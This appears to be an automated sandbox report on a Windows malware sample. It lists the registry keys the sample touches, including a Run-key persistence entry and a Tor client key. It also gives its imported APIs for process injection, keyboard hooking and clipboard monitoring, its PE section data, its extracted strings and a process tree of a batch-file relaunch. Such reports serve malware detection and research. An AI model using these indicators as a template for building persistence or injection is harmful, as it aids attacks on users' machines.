HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\{8E20961D-952E-F0AE-8FA2-992433F6DD98}
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
\xe4\xa4\x90\xe2\xbc\x80
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.WriteProcessMemory
kernel32.dll.HeapCreate
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.GetTickCount
ntdll.dll.RtlNtStatusToDosError
ntdll.dll.NtUnmapViewOfSection
ntdll.dll.NtMapViewOfSection
ntdll.dll.memcpy
ntdll.dll.memset
ntdll.dll.ZwClose
ntdll.dll.NtCreateSection
ntdll.dll.mbstowcs
ntdll.dll.ZwOpenProcessToken
ntdll.dll.ZwOpenProcess
ntdll.dll.ZwQueryInformationToken
ntdll.dll.NtQuerySystemInformation
ntdll.dll.RtlFreeUnicodeString
ntdll.dll.ZwQueryInformationProcess
ntdll.dll.RtlUpcaseUnicodeString
ntdll.dll.RtlUnwind
ntdll.dll.NtQueryVirtualMemory
shlwapi.dll.PathFindExtensionW
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindExtensionA
shlwapi.dll.StrRChrA
shlwapi.dll.StrChrA
shlwapi.dll.StrStrIA
shlwapi.dll.StrTrimW
shlwapi.dll.StrChrW
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathCombineW
setupapi.dll.SetupDiDestroyDeviceInfoList
setupapi.dll.SetupDiEnumDeviceInfo
setupapi.dll.SetupDiGetDeviceRegistryPropertyA
setupapi.dll.SetupDiGetClassDevsA
kernel32.dll.SetEvent
kernel32.dll.Sleep
kernel32.dll.GetExitCodeProcess
kernel32.dll.CreateProcessA
kernel32.dll.lstrlenW
kernel32.dll.GetLastError
kernel32.dll.GetProcAddress
kernel32.dll.ResetEvent
kernel32.dll.LoadLibraryA
kernel32.dll.lstrcmpiW
kernel32.dll.lstrcatW
kernel32.dll.DeleteFileW
kernel32.dll.CreateWaitableTimerA
kernel32.dll.SetFileAttributesW
kernel32.dll.SetWaitableTimer
kernel32.dll.GetModuleHandleA
kernel32.dll.HeapDestroy
kernel32.dll.GetCommandLineW
kernel32.dll.ExitProcess
kernel32.dll.CloseHandle
kernel32.dll.ReadFile
kernel32.dll.WaitForSingleObject
kernel32.dll.CreateFileA
kernel32.dll.CreateEventA
kernel32.dll.GetVersion
kernel32.dll.lstrcmpA
kernel32.dll.GetTempPathA
kernel32.dll.GetTempFileNameA
kernel32.dll.CreateDirectoryA
kernel32.dll.GetFileSize
kernel32.dll.FreeLibrary
kernel32.dll.lstrcpynA
kernel32.dll.GetFileTime
kernel32.dll.FindNextFileA
kernel32.dll.FindClose
kernel32.dll.FindFirstFileA
kernel32.dll.CompareFileTime
kernel32.dll.GetModuleFileNameA
kernel32.dll.lstrcmpiA
kernel32.dll.SetLastError
kernel32.dll.GetModuleHandleW
kernel32.dll.LoadLibraryW
kernel32.dll.TerminateThread
kernel32.dll.GetVersionExW
kernel32.dll.VirtualAlloc
kernel32.dll.IsWow64Process
kernel32.dll.GetCurrentProcessId
kernel32.dll.CreateThread
kernel32.dll.OpenProcess
kernel32.dll.VirtualProtectEx
kernel32.dll.SuspendThread
kernel32.dll.ResumeThread
kernel32.dll.GetLongPathNameW
kernel32.dll.GetModuleFileNameW
kernel32.dll.lstrlenA
kernel32.dll.ExpandEnvironmentStringsA
kernel32.dll.lstrcatA
kernel32.dll.lstrcpyA
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.LocalFree
kernel32.dll.SetEndOfFile
kernel32.dll.CreateDirectoryW
kernel32.dll.WriteFile
kernel32.dll.CreateFileW
kernel32.dll.FlushFileBuffers
kernel32.dll.lstrcpyW
kernel32.dll.SetFilePointer
kernel32.dll.VirtualFree
user32.dll.DefWindowProcW
user32.dll.SendMessageW
user32.dll.GetSystemMetrics
user32.dll.CreateWindowExW
user32.dll.SetWindowLongW
user32.dll.SetClassLongW
user32.dll.SystemParametersInfoW
user32.dll.GetAncestor
user32.dll.GetWindowLongW
user32.dll.RegisterClassExW
user32.dll.GetForegroundWindow
user32.dll.TranslateMessage
user32.dll.GetMessageW
user32.dll.keybd_event
user32.dll.DestroyWindow
user32.dll.wsprintfW
user32.dll.wsprintfA
user32.dll.DispatchMessageW
user32.dll.GetCursorInfo
advapi32.dll.OpenProcessToken
advapi32.dll.RegDeleteValueW
advapi32.dll.RegEnumKeyExA
advapi32.dll.RegOpenKeyW
advapi32.dll.GetTokenInformation
advapi32.dll.GetSidSubAuthorityCount
advapi32.dll.GetSidSubAuthority
advapi32.dll.RegSetValueExW
advapi32.dll.RegOpenKeyA
advapi32.dll.RegCreateKeyA
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorA
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegQueryValueExW
advapi32.dll.RegSetValueExA
advapi32.dll.RegQueryValueExA
shell32.dll.#92
shell32.dll.ShellExecuteW
shell32.dll.ShellExecuteExW
ole32.dll.CoUninitialize
ole32.dll.CoInitializeEx
wintrust.dll.WinVerifyTrust
user32.dll.FindWindowA
user32.dll.GetWindowThreadProcessId
kernel32.dll.Wow64EnableWow64FsRedirection
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
oleaut32.dll.#9
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
ntdll.dll.ZwWow64QueryInformationProcess64
ntdll.dll.ZwWow64ReadVirtualMemory64
ntdll.dll.strcpy
ntdll.dll.NtResumeProcess
ntdll.dll.NtSuspendProcess
ntdll.dll._snprintf
ntdll.dll._wcsupr
ntdll.dll._strupr
ntdll.dll.memmove
ntdll.dll.wcscpy
ntdll.dll.ZwQueryKey
ntdll.dll.wcstombs
ntdll.dll.RtlImageNtHeader
ntdll.dll.RtlAdjustPrivilege
ntdll.dll.sprintf
ntdll.dll.wcscat
ntdll.dll.__C_specific_handler
ntdll.dll.__chkstk
kernel32.dll.GetComputerNameW
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.QueueUserWorkItem
kernel32.dll.SystemTimeToFileTime
kernel32.dll.GetLocalTime
kernel32.dll.RemoveDirectoryA
kernel32.dll.DeleteFileA
kernel32.dll.HeapReAlloc
kernel32.dll.GetCurrentThread
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.CopyFileW
kernel32.dll.GetCurrentThreadId
kernel32.dll.DuplicateHandle
kernel32.dll.SwitchToThread
kernel32.dll.MapViewOfFile
kernel32.dll.UnmapViewOfFile
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.OpenWaitableTimerA
kernel32.dll.OpenMutexA
kernel32.dll.WaitForMultipleObjects
kernel32.dll.CreateMutexA
kernel32.dll.ReleaseMutex
kernel32.dll.GetVersionExA
kernel32.dll.InitializeCriticalSection
kernel32.dll.UnregisterWait
kernel32.dll.TlsGetValue
kernel32.dll.LoadLibraryExW
kernel32.dll.TlsSetValue
kernel32.dll.RegisterWaitForSingleObject
kernel32.dll.VirtualProtect
kernel32.dll.TlsAlloc
kernel32.dll.GetDriveTypeW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.WideCharToMultiByte
kernel32.dll.CreateFileMappingA
kernel32.dll.OpenFileMappingA
kernel32.dll.GlobalLock
kernel32.dll.GlobalUnlock
kernel32.dll.Thread32First
kernel32.dll.Thread32Next
kernel32.dll.QueueUserAPC
kernel32.dll.OpenThread
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.CallNamedPipeA
kernel32.dll.WaitNamedPipeA
kernel32.dll.ConnectNamedPipe
kernel32.dll.GetOverlappedResult
kernel32.dll.DisconnectNamedPipe
kernel32.dll.CreateNamedPipeA
kernel32.dll.CancelIo
kernel32.dll.GetSystemTime
kernel32.dll.RemoveVectoredExceptionHandler
kernel32.dll.SleepEx
kernel32.dll.AddVectoredExceptionHandler
kernel32.dll.OpenEventA
kernel32.dll.LocalAlloc
kernel32.dll.RaiseException
kernel32.dll.FileTimeToSystemTime
kernel32.dll.DeleteCriticalSection
kernel32.dll.RemoveDirectoryW
kernel32.dll.FindNextFileW
kernel32.dll.FindFirstFileW
kernel32.dll.SetFilePointerEx
kernel32.dll.GetFileAttributesW
oleaut32.dll.#8
oleaut32.dll.#2
oleaut32.dll.#6
advapi32.dll.GetUserNameA
psapi.dll.EnumProcessModules
shlwapi.dll.StrToIntExA
shlwapi.dll.StrTrimA
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpQueryOption
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpSendRequest
ws2_32.dll.GetAddrInfoW
ws2_32.dll.WSASocketW
ws2_32.dll.#2
ws2_32.dll.#21
ws2_32.dll.#9
ws2_32.dll.WSAIoctl
ws2_32.dll.FreeAddrInfoW
ws2_32.dll.#6
ws2_32.dll.#5
ws2_32.dll.WSARecv
ws2_32.dll.WSASend
winhttp.dll.WinHttpReceiveResponse
schannel.dll.SpUserModeInitialize
advapi32.dll.RegCreateKeyExW
secur32.dll.FreeContextBuffer
ncrypt.dll.SslOpenProvider
ncrypt.dll.GetSChannelInterface
bcryptprimitives.dll.GetHashInterface
ncrypt.dll.SslIncrementProviderReferenceCount
ncrypt.dll.SslImportKey
bcryptprimitives.dll.GetCipherInterface
ncrypt.dll.SslLookupCipherSuiteInfo
user32.dll.LoadStringW
ncrypt.dll.BCryptOpenAlgorithmProvider
ncrypt.dll.BCryptGetProperty
ncrypt.dll.BCryptCreateHash
ncrypt.dll.BCryptHashData
ncrypt.dll.BCryptFinishHash
ncrypt.dll.BCryptDestroyHash
crypt32.dll.CertGetCertificateChain
userenv.dll.GetUserProfileDirectoryW
sechost.dll.ConvertSidToStringSidW
sechost.dll.ConvertStringSidToSidW
userenv.dll.RegisterGPNotification
gpapi.dll.RegisterGPNotificationInternal
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.CloseServiceHandle
sechost.dll.QueryServiceConfigW
cryptnet.dll.CryptGetObjectUrl
cryptnet.dll.I_CryptNetGetConnectivity
sensapi.dll.IsNetworkAlive
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.NdrClientCall3
cryptnet.dll.CryptRetrieveObjectByUrlW
setupapi.dll.SetupIterateCabinetW
cabinet.dll.#20
cabinet.dll.#22
devrtl.dll.DevRtlGetThreadLogToken
kernel32.dll.RegOpenKeyExW
kernel32.dll.RegCloseKey
cabinet.dll.#23
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptSetHashParam
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptVerifySignatureA
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptHashData
sechost.dll.QueryServiceConfigA
sechost.dll.QueryServiceStatus
rpcrt4.dll.RpcStringBindingComposeA
rpcrt4.dll.RpcBindingFromStringBindingA
rpcrt4.dll.RpcEpResolveBinding
sechost.dll.LookupAccountSidLocalW
sechost.dll.LookupAccountNameLocalW
rpcrt4.dll.RpcStringFreeA
rpcrt4.dll.RpcBindingFree
winhttp.dll.WinHttpSetTimeouts
winhttp.dll.WinHttpCrackUrl
winhttp.dll.WinHttpGetDefaultProxyConfiguration
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
cryptbase.dll.SystemFunction036
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoTaskMemAlloc
ole32.dll.StringFromIID
nsi.dll.NsiAllocateAndGetTable
cfgmgr32.dll.CM_Open_Class_Key_ExW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIfEntry2
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
ole32.dll.CoTaskMemFree
nsi.dll.NsiFreeTable
oleaut32.dll.#500
winhttp.dll.WinHttpGetProxyForUrl
winhttp.dll.WinHttpTimeFromSystemTime
winhttp.dll.WinHttpQueryHeaders
shlwapi.dll.StrStrIW
winhttp.dll.WinHttpQueryDataAvailable
winhttp.dll.WinHttpReadData
winhttp.dll.WinHttpCloseHandle
cryptnet.dll.I_CryptNetSetUrlCacheFlushInfo
bcryptprimitives.dll.GetAsymmetricEncryptionInterface
ncrypt.dll.BCryptImportKeyPair
ncrypt.dll.BCryptVerifySignature
ncrypt.dll.BCryptDestroyKey
winhttp.dll.WinHttpSetStatusCallback
crypt32.dll.CertVerifyCertificateChainPolicy
crypt32.dll.CertFreeCertificateChain
crypt32.dll.CertDuplicateCertificateContext
ncrypt.dll.SslEncryptPacket
ncrypt.dll.SslDecryptPacket
ole32.dll.CreateStreamOnHGlobal
crypt32.dll.CertFreeCertificateContext
user32.dll.GetShellWindow
ntdll.dll.RtlExitUserThread
kernel32.dll.CreateRemoteThread
advapi32.dll.GetUserNameW
ncrypt.dll.SslFreeObject
ws2_32.dll.#22
ws2_32.dll.#3
user32.dll.SetWindowsHookExA
user32.dll.RegisterClassA
user32.dll.CreateWindowExA
user32.dll.GetWindowLongPtrA
user32.dll.DefWindowProcA
user32.dll.SetWindowLongPtrA
user32.dll.SetClipboardViewer
user32.dll.IsClipboardFormatAvailable
user32.dll.GetClipboardOwner
user32.dll.RegisterDeviceNotificationA
user32.dll.GetMessageA
"C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
C:\Windows\system32\svchost.exe
sneddddga
{202A4396-FFD6-5278-8954-A3A6CDC8873A}
Local\{C08C1C5D-1F99-F213-A9F4-C346ED68A7DA}
{C4CA9F68-5357-9674-FD38-372A81EC5BFE}

PE Information

Image Base 0x00400000
Entry Point 0x00405493
Reported Checksum 0x000578ee
Actual Checksum 0x000578ee
Minimum OS Version 5.1
Compile Time 2016-05-10 03:04:39
Import Hash cc79e5d1893e37143e121d47aeb51eb4

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00008212 0x00008400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 5.36
.data 0x0000a000 0x000006ca 0x00000800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.64
.rsrc 0x0000b000 0x00045910 0x00045a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 8.00

Imports

Library advapi32.dll:
0x402000 CryptSignHashA
0x402004 InitializeAcl
0x402008 RegReplaceKeyW
0x40200c RegSaveKeyA
0x402010 IsTextUnicode
0x402014 RegCreateKeyExA
0x402018 RegLoadKeyA
0x40201c LogonUserA
0x402020 RegEnumKeyA
0x402024 OpenEventLogW
0x402028 ReadEventLogA
0x40202c RegRestoreKeyA
0x402030 RegUnLoadKeyW
Library kernel32.dll:
0x402038 GetProcAddress
0x40203c OpenWaitableTimerW
0x402040 GetTempPathA
0x402044 CreateFileW
0x402048 GetCurrencyFormatA
0x40204c FindResourceExW
0x402050 IsBadWritePtr
0x402054 InterlockedExchange
0x402058 FindFirstFileW
0x40205c GetFullPathNameW
0x402060 GetProfileStringA
0x402064 GlobalAddAtomW
0x402068 LoadLibraryExA
0x40206c SetEvent
0x402070 GetModuleHandleA
0x402074 CreateMutexA
0x402078 GetPriorityClass
0x40207c ReadFile
0x402080 lstrcmp
0x402084 GetConsoleTitleA
0x402088 CreateFileMappingW
0x40208c ResumeThread
0x402090 OpenMutexA
0x402094 FormatMessageW
0x402098 CreateSemaphoreW
0x4020a8 GetConsoleAliasA
0x4020ac GetStartupInfoA
0x4020b0 ReadConsoleW
0x4020b8 FindNextFileA
Library mprapi.dll:
0x4020c0 MprInfoBlockAdd
0x4020c4 MprAdminDeviceEnum
0x4020c8 MprInfoBlockFind
Library crypt32.dll:
0x4020d0 CryptMemFree
0x4020d8 CertFindExtension
0x4020e0 CertCloseStore
0x4020e4 CryptFindOIDInfo
0x4020e8 CertControlStore
0x4020ec CertDuplicateStore
0x4020f0 CryptDecodeMessage
0x4020f8 CertGetNameStringA
0x402104 CertAlgIdToOID
0x402108 CryptMemAlloc
Library certcli.dll:
0x402110 CACloseCA
0x402114 CAEnumFirstCA

.text
`.data
.rsrc
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
OpenEventLogW
RegUnLoadKeyW
CryptSignHashA
ReadEventLogA
IsTextUnicode
RegRestoreKeyA
RegLoadKeyA
RegCreateKeyExA
LogonUserA
RegEnumKeyA
RegReplaceKeyW
InitializeAcl
RegSaveKeyA
advapi32.dll
FindFirstFileW
CreateSemaphoreW
LoadLibraryExA
lstrcmp
ReadFile
CreateFileMappingW
GetFullPathNameW
InterlockedExchange
ResumeThread
GetPriorityClass
GetStartupInfoA
CreateFileW
GetPrivateProfileIntA
FormatMessageW
GetConsoleAliasA
GlobalAddAtomW
GetCurrencyFormatA
InterlockedIncrement
GetProfileStringA
SetEvent
ReadConsoleW
GetConsoleTitleA
GetModuleHandleA
FindNextFileA
GetProcAddress
WaitForSingleObjectEx
GetLogicalDriveStringsW
CreateMutexA
FindResourceExW
OpenWaitableTimerW
IsBadWritePtr
GetTempPathA
OpenMutexA
kernel32.dll
MprInfoBlockAdd
MprAdminDeviceEnum
MprInfoBlockFind
mprapi.dll
CryptMemFree
CertDuplicateStore
CryptMemAlloc
CertAlgIdToOID
CertFindExtension
CryptDecodeMessage
CertDuplicateCRLContext
CertGetNameStringA
CryptBinaryToStringA
CertCompareCertificate
CryptFindOIDInfo
CertControlStore
CertDeleteCRLFromStore
CertCloseStore
CertCreateCRLContext
crypt32.dll
CAEnumFirstCA
CACloseCA
certcli.dll
gbycfilt.dll
egggeProcessMemory
ggrnel32.dll
ggapCreate
oruqvrjjmiprs
ernibkis
sneddddga
hokoa.pdb
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
9:;<=>?
!"#$%&'
)*+,-./
1234567
3QE*8
)cP=u
ZZ#bW
!-"*yv
X2;Hw
MqQ@\
[RK!kU
ljm,8
This file is not on VirusTotal.

Process Tree

  • ErfkBwzLz2p.exe 920
    • cmd.exe 332 cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
      • cmd.exe 2576 cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
        • corrawex.exe 948 "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
  • explorer.exe 1632

ErfkBwzLz2p.exe, PID: 920, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe"
cmd.exe, PID: 332, Parent PID: 920
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
cmd.exe, PID: 2576, Parent PID: 332
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
corrawex.exe, PID: 948, Parent PID: 2576
